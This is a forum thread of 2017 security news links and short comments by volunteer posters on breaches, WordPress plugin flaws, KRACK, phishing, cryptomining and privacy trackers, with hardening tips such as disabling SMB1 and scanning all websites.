https://medium.freecodecamp.org/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c
polonus
-
Malicious website crypto-mining:
https://www.cybereason.com/labs-cybereason-detects-adylkuzz-cryptocurrency-botnet-using-doublepulsar-exploit-in-japan/
Re: https://unix.stackexchange.com/questions/144412/why-am-i-getting-inconsistent-ip-values-from-icanhazip-com-or-curlmyip-com
and https://forums.malwarebytes.com/topic/167967-2325325467-hxxpicanhazipcom/
and https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ADRF/detailed-analysis.aspx
polonus
P.S. Also look here: http://www.badbitcoin.org/thebadlist/
-
Additional information regarding the recent CCleaner APT security incident
https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident
-
Interesting, Pondus, very in teresting, all around LA's ServerCrate C2 server,
and the links to Rumania, shortly a peak into the sordid little world of state actor infostealers.
Not a place to dwell in...
polonus
-
Activist attacked by advanced targeted PHISHING: https://www.eff.org/deeplinks/2017/09/phish-future
Scary, are Big Brother agents fighting free expression that does not fits them well?
polonus
-
The Coming Software Apocalypse:
https://www.theatlantic.com/technology/archive/2017/09/saving-the-world-from-code/540393/
polonus
-
Apple computers are at risk from flawed updates, researchers find
https://www.cnet.com/news/apple-macbook-vulnerable-firmware-updates/
Apple may not be alone
Smith said Windows computers likely have similar (or worse) problems, but he doesn't yet have data to support that suspicion.
-
Internet wide security update on hold: https://lists.dns-oarc.net/pipermail/dns-operations/2017-September/016766.html
There are a number of reasons why systems may not be ready to accept the new KSK key:
An old configuration with the 2010 key written into the code itself.
A failure to implement the RFC 5011 protocol that will automatically update the key.
Flaws or conflicts in software that prevent the automatic rollover from happening, or accepting the change when it does happen.
No matter what the reason, it is an indication of how incredibly difficult it is to update the internet on a network-wide basis. Just look at IPv6.
pol
-
Three new zero-days being abused in Word Press plug-ins:
https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/
PHP-based CMS, a disaster in the hands of the unsavvy!
polonus
-
Every single Yahoo account was compromised by hackers
http://nordic.businessinsider.com/yahoo-3-billion-accounts-were-compromised-in-its-hacking-attack-2017-10?r=US&IR=T
https://www.bloomberg.com/news/articles/2017-10-03/yahoo-says-all-3-billion-users-probably-affected-by-2013-breach
http://www.marketwatch.com/story/every-yahoo-account-was-affected-by-2013-hack-verizon-now-says-2017-10-03
-
Win7 kernel security to be applied to Win10 kernel as well?
That is what Google wants: https://googleprojectzero.blogspot.nl/2017/10/using-binary-diffing-to-discover.html
polonus
P.S. See attached code txt attached, copyright 1989 by Dave Angel, providing a mem-dump for fuzzers. (pol)
-
Security Alert: User Info Breach
https://blog.disqus.com/security-alert-user-info-breach
-
Security Alert: User Info Breach
https://blog.disqus.com/security-alert-user-info-breach (https://blog.disqus.com/security-alert-user-info-breach)
Ouch. Would be nice if they informed their users. :(
-
Another vulnerable plug-in in Word Press: https://web.archive.org/web/20170817183628/https://wordpress.org/plugins/postman-smtp/
Patched by another developer: https://github.com/yehudah/Postman-SMTP
polonus
-
Forrester.com Experienced A Cybersecurity Incident
https://go.forrester.com/blogs/forrester-com-experienced-a-cybersecurity-incident/
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
The only thing is that I'm not surprised about what MS gets up to or in this case doesn't get up to.
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
The only thing is that I'm not surprised about what MS gets up to or in this case doesn't get up to.
Yepp you have to trust that your AV vendor has those exploits blocked
https://googleprojectzero.blogspot.no/2017/10/using-binary-diffing-to-discover.html
-
SS7 (Signalling System 7) protocol, is as holed as holed can be. Do no longer use SMS authentication!
Read: http://anonymous-news.com/how-hackers-can-use-two-factor-authentication-to-hack-your-gmail-empty-bitcoin-wallet/
polonus
P.S. Related threat -usb-cable with inbuilt-sim-card... https://secure.dshield.org/forums/diary/Whats+in+a+cable+The+dangers+of+unauthorized+cables/22904/
Damian
-
Google allows 37,000 Chrome users to be tricked with a fake extension by fraudulent developer who clones popular name and spams keywords.
https://twitter.com/SwiftOnSecurity/status/917446126382526464
-
Whatsapp and similar apps could be spied upon for data about your wake/sleeping patterns and other interesting data...
Re: https://robertheaton.com/2017/10/09/tracking-friends-and-strangers-using-whatsapp/
Re: https://news.ycombinator.com/item?id=15435822 (about other scenario's)....
A phone number could be enough of a lead....
Frightening is not it? A world without any privacy!
polonus
-
Russia to block access to "dubious" cryprocurrency exchanges websites, as they call it:
https://www.theregister.co.uk/2017/10/10/russia_to_ban_cryptocurrency_exchanges/
Certainly there are bad bitcoin scam & fake miners sites: http://www.badbitcoin.org/thebadlist/
And these better schould be blocked.
polonus
-
Alert https://www.ncsc.nl/actueel/factsheets/factsheet-tls-interceptie.html
Example where things are wrong: https://urlquery.net/report/be049d88-859c-4fa8-8cb9-8cc53e4de3fc
and http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fsd-1367041-l.dattaweb.com%2F
and -http://sd-1367041-l.dattaweb.com/
Warnings
TLS1.2
This server is vulnerable to a TLS renegotiation attack
Site cert has 2 errors
Wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Intermediate certificate missing.
GeoTrust SSL CA - G3 -> https://observatory.mozilla.org/analyze.html?host=sd-1367041-l.dattaweb.com
Normal user should trust those that keep these servers up.
polonus (checking it for you ;D )
-
"Responsible encryption" to facilitate the Surveillance State a bad idea:
EFF's response to the proposals...
https://www.eff.org/deeplinks/2017/10/deputy-attorney-general-rosensteins-responsible-encryption-demand-bad-and-he
What we need is good e2e encryption everywhere.
It is either full encryption or no encryption at all, and digi-n00b politicians won't understand. (Rosenstein, Budd etc.).
Make sure to introduce TLS 1.3 on websites everywhere:
Enhanced Security
Most of the attacks on TLS from the last few years targeted vestigial pieces of the protocol left around from the 90s. TLS 1.2 is highly configurable, and vulnerable sites simply failed to disable the older features in hopes of being compatible with old browsers.
TLS 1.3 embraces the “less is more” philosophy, removing support for older broken forms of cryptography. That means you can’t turn on the potentially vulnerable stuff, even if you try. The list of TLS 1.2 features that have been removed is extensive, and most of the exiled features have been associated with high profile attacks. These include:
RSA key transport — Doesn’t provide forward secrecy
CBC mode ciphers — Responsible for BEAST, and Lucky 13
RC4 stream cipher — Not secure for use in HTTPS
SHA-1 hash function — Deprecated in favor of SHA-2
Arbitrary Diffie-Hellman groups — CVE-2016-0701
Export ciphers — Responsible for FREAK and LogJam
Quote from Introducing TLS 1,3 by CloudFlare CDN.
Google Chrome and firefox support TLS 1,3 as per default.
Let us make the world more secure in stead of less secure,
polonus (volunteer website security analyst and website error-hunter)
-
Microsoft Corp. faces a coordinated investigation by European privacy regulators after it failed to do enough to address their concerns about the collection and processing of user data with a series of changes to Windows 10 last month.
https://www.bloomberg.com/news/articles/2017-02-21/microsoft-faces-european-privacy-probes-over-windows-10
Data-protection agencies from the Netherlands, Germany, France, the U.K., Spain, Hungary and Slovenia are collaborating on the Microsoft probes according to Dutch Watchdog.
polonus
-
Third party malscript injection: https://arstechnica.com/information-technology/2017/10/equifax-rival-transunion-also-sends-site-visitors-to-malicious-pages/
The Internet is an insecure place often....
polonus
-
Microsoft’s October Patch Tuesday Fixes 62 Vulnerabilities, including an Office Zero-Day
http://blog.trendmicro.com/trendlabs-security-intelligence/microsofts-october-patch-tuesday-office-zero-day/
-
Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse
https://www.krackattacks.com/
-
Thanks Pondus,
Especially endangering to 32% of the android users out on Android 6.0.
Will they all get the update?
The 4-way handshake vulnerable has been around for a shocking 14 years...
link: https://developer.android.com/about/dashboards/index.html
See attached info...
polonus
-
NoScript firefox bug -icon disappearedg: https://forums.informaction.com/viewtopic.php?f=7&t=23388&p=90410&hilit=icon#p90410
polonus
-
I noticed the No Script icon went walk about, rather than do as was suggested in that URL, I just went into the Customise option of Firefox and found it in a different location. I just dragged it back down to where I normally have it (bottom right of the window).
-
Vulnerable to WPA2-attack is, see: https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=228519&SearchOrder=4
polonus
-
Vulnerable to WPA2-attack is, see: https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=228519&SearchOrder=4
polonus
In the case of modems and routers received from an ISP, "Date Updated" means on existing devices in people's homes and offices, or devices people will be getting from now on?
-
Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse
https://www.krackattacks.com/
Microsoft shuts down Krack with sneaky Windows update
https://www.computerworld.com/article/3233198/microsoft-windows/microsoft-shuts-down-krack-with-sneaky-windows-update.html
-
A New IoT Botnet Storm is Coming
https://research.checkpoint.com/new-iot-botnet-storm-coming/
-
Another zero-day in extension used to attack websites with WordPress detected by Wordfence.
https://wordpress.org/plugins/ultimate-form-builder-lite/#developers
pol
-
New authentication method on lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
-
New authentication method on lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
Personally since the various security issues relating to Lenovo, I would be wary of any security related promotion connected to Lenovo.
Previous to my purchase of this win10 acer notebook, lenovo products were attractive given the Performance Vs Price. Security issues however, took lenovo right off my list and they haven't regained my trust (very hard in my case).
Also fingerprints as a security measure are loosing ground as far as security goes, they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints, the young are relatively clear and well defined those older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
-
New authentication method on lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication (http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication)
Is it safe and cannot it be circumvented?
polonus
Personally since the various security issues relating to Lenovo, I would be wary of any security related promotion connected to Lenovo.
Previous to my purchase of this win10 acer notebook, lenovo products were attractive given the Performance Vs Price. Security issues however, took lenovo right off my list and they haven't regained my trust (very hard in my case).
Also fingerprints as a security measure are loosing ground as far as security goes, they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints, the young are relatively clear and well defined those older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
As long as we're just talking about fingerprints, I'll agree with you. :) :) :)
-
New authentication method on lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication (http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication)
Is it safe and cannot it be circumvented?
polonus
<snip>
Also fingerprints as a security measure are loosing ground as far as security goes, they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints, the young are relatively clear and well defined those older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
As long as we're just talking about fingerprints, I'll agree with you. :) :) :)
Yes that is the 'main' train of my thoughts fingerprints really aren't that great as far as security is concerned. There have been articles about biometrics.
"The measurement of physical characteristics, such as fingerprints, DNA, or retinal patterns, for use in verifying the identity of individuals" from http://www.tfd.com/biometrics .
Retinal use for id purposes has also had some negative reports/issues if used for authentication. Whilst the use of DNA is probably the most secure it has a long way to go before it can be used for id/authentication at such a low level. I don't think that we will see 'lick/touch screens/pads' to analyse your saliva any time soon.
-
Bad Rabbit: Not-Petya is back with improved ransomware
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ (https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/)
-
Tyrant Ransomware Spreads in Iran Disguised as Popular VPN App
https://www.bleepingcomputer.com/news/security/tyrant-ransomware-spreads-in-iran-disguised-as-popular-vpn-app/
-
Dwindling privacy and less security resulting in ever so many data-breaches, now again in the land of down under:
https://medium.com/@woj_ciech/short-story-about-s3-bucket-python-script-thousands-of-data-and-australian-government-435e4d2b213e
polonus
-
A typical case of lack of input validation for e-mail fraud- damage for customers could be over a million in dollars...
http://theartnewspaper.com/news/galleries-lose-large-sums-to-cybercrime
2FA, in a lot of cases, it cannot come in too soon,
polonus
-
Tor browser IP leaks for linux- and Mac-users:
Tor project came with an important update: https://blog.torproject.org/tor-browser-709-released
This bug was detected as a design flaw: https://trac.torproject.org/projects/tor/ticket/24052
For some the leakage was hard to reproduce.
Probably the design error was found, because of the transition to unix domain sockets.
Read about this by Robert Ransom at this link: https://packetstormsecurity.com/files/112439/torproxy-bypass.txt
How to reproduce an example was given here: https://trac.torproject.org/projects/tor/ticket/5741
Download and verify "tor-browser-gnu-linux-i686-2.2.35-10-dev-en-US.tar.gz"
Start up Wireshark to monitor your network, optionally filtering for "dns"
Unpack Tor and start it by running the "start-tor-browser" script
Once TorBrowser is open, go to "?http://bitcoincharts.com/"
See DNS request for "bitcoincharts.com" being logged in Wireshark
System information:
Tor Browser Bundle for 32-bit Linux, version 2.2.35-10
Running on Fedora 16
To reproduce the exact syntax used and configuration are important,
obfuscation already can be an erroneous factor,
those into reproducing could come up with their own "scrum-report" of sorts.
(info credits security dot nl).
polonus
P.S. The right order and right use of vpn and tor on whonix could be critical for security reasons.
Important notice:
Remember to use these anonimity tools only for legitimate use. Abuse of such services is an legal offence,
and abusers will often suffer the consequences, when found out. No hacker is really out of harm's way. :D
In some countries the use of such tools may be forbidden (certain VPN services in the Russian Federation,
when keys are withheld from the authorities).
Damian
-
Asian government sites hacked to be abused by PHISHing: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
pol
-
PHISHING back as one of the major Internet threats, why so few phishing websites are actually detected and blocked by AV?
See the report: https://security.googleblog.com/2017/11/new-research-understanding-root-cause.html
Best phising detection performance from IDS alerting "fortinet's" see urlquery.net results.
Also check on: http://www.urlvoid.com/scan/freckleface.com.au/
Bitdefender TrafficLight extension and Webutation Rating also do a fine job.
The average AV solution often miserably fails in detecting or
are detecting long after the fact, when the actual phishing campaign is long over.
Third party content blocking via NoScript and uMatrix and browser hygiene is your best option.
Just an example where average AV fails: http://www.urlvoid.com/scan/freckleface.com.au/ -> https://urlquery.net/report/7e257590-c233-482d-871b-db7baadbb167
where only OpenPhish and fortinet detect and alert this.
Also has to do with what we consider accepted legal phishing by a big techno corporation, like Google's for instance,
and what is considered as 'bad phishing', two standards going and a lot of confusion for the modern end-user ::)
polonus (volunteer website security analyst and website error-hunter0
-
This needs to be done ASAP - Disable SMB1 (https://davescomputertips.com/why-you-need-to-disable-smb1-now/?utm_source=wysija&utm_medium=email&utm_campaign=Weekly+Recap+Newsletter)
Server Message Block (SMB) is a local network file sharing protocol designed for sharing data, printers, etc.
between computers. SMBv1 is the formative iteration of the protocol which has since been replaced by SMBv2 and SMBv3.
SMB1 is still enabled by default in Windows simply to cater for specific older software which hasn’t been updated to support SMB2 or SMB3.
Microsoft will be disabling SMB1 by default starting with the Windows 10 Fall Creators Update.
It was still turned on on my systems and they are all running Windows 10 Fall Creators Update
-
@bob3160
Very interesting, but I do find the response by many companies "Vendor does not publicly document their requirement for SMB1." That is pretty poor and almost an admission that they do use it, this certainly doesn't help the user protect their system.
I would be seriously looking to get rid of any program that doesn't comment on their use of SMBv1, if they do, then their users systems could be at risk. If they don't use it (or use a later version of SMBv?) then their users aren't at risk, but should still disable SMBv1.
-
@bob3160
Very interesting, but I do find the response by many companies "Vendor does not publicly document their requirement for SMB1." That is pretty poor and almost an admission that they do use it, this certainly doesn't help the user protect their system.
I would be seriously looking to get rid of any program that doesn't comment on their use of SMBv1, if they do, then their users systems could be at risk. If they don't use it (or use a later version of SMBv?) then their users aren't at risk, but should still disable SMBv1.
I'm happy to report that disabling SMB1 has not effected my new Epson ET-2650 (https://epson.com/For-Home/Printers/Inkjet/Epson-Expression-ET-2650-EcoTank-All-in-One-Printer/p/C11CF47201) printer. :)
-
Another vulnerable Word Press plug-in reported by Sucuri's:
https://blog.sucuri.net/2017/11/sql-injection-bbpress.html
Check Word Press here: https://hackertarget.com/wordpress-security-scan/
and via domxssscanner.com/scan
polonus (volunteer website security analyst and website error-hunter)
-
White House announces their new zero-day announcement policy.
What to announce and publish, what to patch and what to keep secret to use by government services,
hopefully unknown to other parties.
https://www.whitehouse.gov/blog/2017/11/15/improving-and-making-vulnerability-equities-process-transparent-right-thing-do
Mind that zero-day info proliferation is always bad and especially
when eventually all knowledge will land into the hands of oponents or criminals (cyberthreats).
No zero-days and full transparency and a full secure and safe infrastructure should be the ideal we are after,
but that is outside a real world situation and does not suit common big government's AI surveillance demands.
polonus
-
@ Damien,
https://forum.avast.com/index.php?topic=66267.msg1431062#msg1431062 (https://forum.avast.com/index.php?topic=66267.msg1431062#msg1431062)
Better late than never. :)
-
Agree with you there, bob3160, a form of wising up.
Damian
-
ftp://Torbrowser, scripts and compromittal of nodes.
When using tor-browser for legit purposes, you do not want your entry nodes compromised.
What to do when all your entry nodes are exclusively US or UK nodes for instance?
Well you could set these settings in your config
StrictNodes 1
ExcludeNodes {US}
Quote info credits go to: alexey vesnin
Those that do not read-in sufficiently on protocols and settings and the inner workings of a tool
will be a danger to themselves and others on tor.
Lack of proper knowledge is an endangering neglicence.
That is one of the reasons why a lot of dumb criminals do not find a legit job,
as they will get caught for not paying attention.
Tor developers learned from Operation Onymous for instance
where the basic protection of tor was being compromised,
when ten exit nodes were being taken down at once,
and in Miami and Amsterdam three servers were confiscated.
Tor developers like to understand as how to better protect through entry guard.
Not that they wanna frustrate taking down illegal or criminal servers,
but they wanna protect against compromise through dictatorial regimes against journalists,
that seek to protect their privacy through the use via tools like tails and tor.
Always true however: "Do not do the crime, if you cannot do the time!".
Stay away from tor whenever you can avoid it
and do not share with the Internet what you do not wanna share with others.
polonus
-
Pentagon leaks data through Amazon S3 buckets
Read: https://www.upguard.com/breaches/cloud-leak-centcom
Unless the fact that Amazon introduced new warning for leakage measures:
https://aws.amazon.com/blogs/aws/new-amazon-s3-encryption-security-features/
Good to read further here: https://blog.detectify.com/2017/07/13/aws-s3-misconfiguration-explained-fix/
A misconfiguration in the cloud, could leave you with a lot of data-breach misery.
The six vulnerability schemes that were ('hopefully not any longer there'):
Amazon S3 bucket allows for full anonymous access
Amazon S3 bucket allows for arbitrary file listing
Amazon S3 bucket allows for arbitrary file upload and exposure
Amazon S3 bucket allows for blind uploads
Amazon S3 bucket allows arbitrary read/writes of objects
Amazon S3 bucket reveals ACP/ACL
"Yes, baby, it is a wild world on that infrastructure :o ".
Amazon getting too big to fail will mean an advanced security risk.
More of a mono-culture will always mean more attack surface,
and that means increased targeted attacks and threats.
polonus
-
i don't know where to post this
so this is as good as any place
the new avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion
if there is a way to fix it plz inform otherwise i am on the hunt for another antivirus :(
-
i don't know where to post this
so this is as good as any place
the new avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion
if there is a way to fix it plz inform otherwise i am on the hunt for another antivirus :(
In your own new topic in the following forum:
https://forum.avast.com/index.php?board=4.0
Describing when these files got deleted would help.
A screenshot would also be be of help.
Are those files now in the virus chest???
-
i don't know where to post this
so this is as good as any place
the new avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion
if there is a way to fix it plz inform otherwise i am on the hunt for another antivirus :(
This topic and sub-forum is unrelated to your problem the Virusers & Worms (https://forum.avast.com/index.php?board=4.0) sub forum.
This is where you report a suspected false positive. At the top of these forums is a New Topic button to start your own new topic.
You will need to give more information on the 'file name', 'location' and 'malware name' given in the detections.
-
Hundreds of very popular top sites will send all your keystrokes, mouse movements, scrollbehavior and content of visited pages to 3rd parties via so-called replay-scripts, and this without your consent or you even knowing. It is almost resembles someone shouldersurfing you all of the time. :o
Very personal private data you share with the Internet like your private medical data, your credit card data and/or other personal private data could literally all have flown 'out of the window' by now.
Read: https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
Most adblock scripts do not cover (all of) such replay-scripts .
Launchers thereof also do not honor the DoNotTrack setting in browsers.
Big websites do not respect their end-users' integrity.
I hope this will come to bite them in the end and they will pay with popularity.
Time for NoScript, uMatrix or a key scrambler now?
polonus
-
This is the list of shame:
https://webtransparency.cs.princeton.edu/no_boundaries/session_replay_sites.html
We should not be run such scripts in clients.
Whatever they wanna do with code on their servers is their thing,
but keep it out of my browser please.
polonus
-
Vulnerability Note VU#817544
Windows 8 and later fail to properly randomize every application if system-wide mandatory ASLR is enabled via EMET or Windows Defender Exploit Guard
https://www.kb.cert.org/vuls/id/817544
-
Already ongoing an eye for an eye hacking: https://www.thedailybeast.com/inside-the-shadowy-world-of-revenge-hackers
Corporations do not propogate this officially of-course, but now these German cyber-ops wanna start hacking back:
https://www.zitis.bund.de/DE/Home/home_node.html
Read: http://www.spiegel.de/netzwelt/netzpolitik/cyberwar-zitis-praesident-wilfried-karl-will-digitalen-gegenschlag-a-1179729.html
Translate from German using Google Translate please.
pol
-
2016 Data Security Incident
https://www.uber.com/newsroom/2016-data-incident
-
Word Press websites attacked through holes in two popular plug-ins:
https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html
Check the security of a Word Press website domain here: https://hackertarget.com/wordpress-security-scan/
Also check for retirable jQuery code: retire.insecurity.today/#
and check here: https://aw-snap.info/file-viewer/
Keep your website CMS up to date and fully patched also to keep others more secure!
polonus (volunteer website security analyst and website error-hunter)
-
https://blog.imgur.com/2017/11/24/notice-of-data-breach/
imgur, a popular image hosting site has been hacked.
"On the morning of November 24th, we began notifying impacted users via their registered email address. We are immediately requiring that these users update their password." imgur
-
Hidden trackers in popular Android-apps: Read: https://privacylab.yale.edu/press
A solution outside of the Google webshop (because it is not allowed there,
because it interferes with the Google business model of data-slurping,
profiling and tracking all of your data
= blokada - Blokada is a free, open source, compact,
fast ad blocker for Android that works for all apps and does not require root.
-> https://github.com/blokadaorg/blokada
Best browser on android i.m.o. = Brave together with Disconnect me.
polonus (volunteer website security analyst and website error-hunter)
-
Considerable increase in amount of SQL attacks of web applications found:
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q3-2017-state-of-the-internet-security-report.pdf
polonus
-
If you have a Mac, you have a Security problem.
Here's how to fix it untill Apple comes up with a patch.
https://www.howtogeek.com/334611/huge-macos-bug-allows-root-login-without-a-password.-heres-the-fix/ (https://www.howtogeek.com/334611/huge-macos-bug-allows-root-login-without-a-password.-heres-the-fix/)
-
Cryptominer goes on mining after you closed the browser window through a pop-under:
https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/
polonus
-
Cryptominer goes on mining after you closed the browser window through a pop-under:
https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/ (https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/)
polonus
(http://screencast-o-matic.com/screenshots/u/Lh/1512048226929-24769.png)
Have you tried No Coin ???
https://docs.google.com/document/d/1t-KnUTbvVcFnB0l2h0ftDdGuKQmbeF4uMur4-rl3c8o/edit?usp=sharing
-
New Shadow BTCware Ransomware Variant Released
A new variant of the BTCWare ransomware was discovered by Michael Gillespie, that appends the .[email]-id-id.shadow extension to encrypted files. The BTCWare family of ransomware infections targets its victims by hacking into poorly protected remote desktop services and manually installing the ransomware.
-
WordPress 4.9.1 Security and Maintenance Release
https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
-
New Mirai Attack Attempts Detected in South America and North African Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-attack-attempts-detected-south-america-north-african-countries/
https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/new-mirai-variant-found-spreading-like-wildfire
-
forum dot avast dot com site's nameservers configuration security issue:
Stealth name servers Failed Found name servers which are listed by the authoritative servers, but not by the parent ones:
ns6.avast.com at ns2.avast.com
sns.avast.com at ns2.avast.com
sns.avast.com at pns.avast.com
ns6.avast.com at pns.avast.com
Another issue Google Apps settings Warning The top priority mail server is ASPMX.L.GOOGLE.com, but TTL is not equal to the recommended value (86400).
On cert: Supported cipher suites Warning Your server supports suboptimal cipher suites:
DES-CBC3-SHA
Quotes above taken from a public scan at Threat Intelligence Platform for -https://forum.avast.com
polonus (volunteer website security analyst and website error-hunter)
-
Keylogger activity on thousands of hacked WordPress sites:
https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html
polonus (volunteer website security analyst and website error-hunter)
P.S. Instruction to find the malscript in given Sucuri blog post link : The injected part of this malware didn’t change at all, using the theme’s function.php to enqueue the following scripts to WordPress pages.
Read on the problem of bitcoin mining scripts and how avast will keep us secure:
https://blog.avast.com/avast-blocked-more-than-34-million-monero-cryptomining-attacks
(blog post credits: avast's Denis Konopisky)
D
-
Just to give an idea what script was being abused to inject reconnecting-websocket.js -> https://www.reverse.it/sample/23118b9873d0ba566f606dcaa27f5c078b2c2f6259e8470ffa71875119897b5d?environmentId=100
Also the way Brute Force is being used here via Bluto abuse: https://gr.pinterest.com/pin/328410997819076735/
pol
-
Spyware inside printer software (weakly protected as usual)
is the royal way into your firm network for spies and sp**ks:
Re: https://zwclose.github.io/HP-keylogger/
When they are in your printer they are inside your network.
With all the spyware added lately to all kind of hardware,
it seems consumer rights are being violated on a grand scale everywhere,
and nobody seems to take your consumer rights seriously.
polonus
-
Do not get it wrong. 25% of PHISHING websites now offer secure connections.
These certifiied websites (Comodo or Let's Encrypt certification) have a green padlock,
so Mr. and Mrs. Average End-user will think such websites are safe. They are not!
They only have a secure connection to.... unsafety!
Read: https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains
polonus
-
This will implement with avast we will have to untag "no scanning of trusted websites",
but have all websites scanned, marked as trusted and not trusted alike.
Because in this case it could be a trusted phishing site (a contradictio in terminis),
that we tagged not to be scanned by avast. Capito? Always set to scan all sites!
polonus
-
Here is how to have avast scan all websites. See attached below.
As 'Do not scan trusted websites' is already checked off by default, so in order to have avast scan all websites, including trusted ones, this box must be cleared off and the check removed.
Should be noted that a clean install will always restore this setting to not scan trusted websites so it is one of the things that must be checked on a new install of avast if you do not wish this behavior.
-
This should make it very easy for even a novice to follow
(http://screencast-o-matic.com/screenshots/u/Lh/1512923654669-33537.png)
-
Thank you, bob3160, for keeping everybody secure with this message,
together with your very clear picture and additional arrows,
that go the right direction. ;D ;)
Hope everybody stays safe that way.
Damian
-
CONFICKER / DOWNAD / DOWNADUP 9 Years After
http://blog.trendmicro.com/trendlabs-security-intelligence/conficker-downad-9-years-examining-impact-legacy-systems/
CVE-2008-4250 dominates our detections for vulnerabilities, with over 60,000 for the month of October 2017 alone.
All these clues paint a picture of the typical DOWNAD victim: organizations in key industries, typically from developing countries, that use outdated, unpatched legacy systems as an integral part of their network.
Conficker > https://en.wikipedia.org/wiki/Conficker
Until recently two versions of conficer was still on F-Secure top 10 detections evry 24H
VirusMap > http://worldmap3.f-secure.com/
-
Hi Pondus,
According toTrend Micro Conficker can be characterized as"background-malware", specially being active on legacy-systems.
"Not quite as interesting to a larger audience like modern malware like WannaCry & Petya, it still is a persistent threat and will be so as long as no longer supported, unpatched legacy systems form part of corporate networks".
polonus
-
Problem with bogus EV SSL-certificates has been demonstrated by researcher:
Read: https://twitter.com/iangcarroll/status/940281927789146112
Costed the researcher under half an hour and 177 dollars to spoof the real extended validated certificate.
Is this a danger? And how it is!
More and more is shown that certification online has the same problems.
than all of the rest of the infrastructure, it is pn*wed and holed from all sites around
to serve black hat and other sp**ks from your own government together with cybercriminals all sorts.
If they wanna target you in person, you are birdfeed in no time,
and all the time the going gets narrower. ;D ::) >:(
polonus
-
“Suspicious” event routes traffic for big-name sites through Russia
https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia/
-
(http://screencast-o-matic.com/screenshots/u/Lh/1513282432173-62724.png)
-
Hi bob3160,
Not good for your US consumers, not good for your US businesses.
Opens up a box of Pandora of mischief, that will go on unnoticed until found out years later.
Those that start to throttle will be out of business sooner or later, that is predictable.
I wish you all good luck with it.
"When you in the States are feeling the rain, in Europe it starts to drip. ;D".
Damian
-
Other holed themes, Newspaper en Newsmag, to infest Word Press CMS sites through:
https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html
pol
-
NSA more than likely compromised encryption for surveillance targeting:
Read how hard it is to detect mathematical backdoors and much easier to inject these into export standards:
https://www.theregister.co.uk/2017/12/15/crypto_mathematical_backdoors/
This may come as shocking news for many after the "controlled" revelations by Snowden and Assange.
Read: https://www.theregister.co.uk/2013/09/23/rsa_crypto_warning/
and is blockchain as security chain coming to the rescue:
https://www.packtpub.com/big-data-and-business-intelligence/mastering-blockchain
The infrastructure is broken, trust is a thing of the past, we have landed in the middle of an insecure Interwebs swamp,
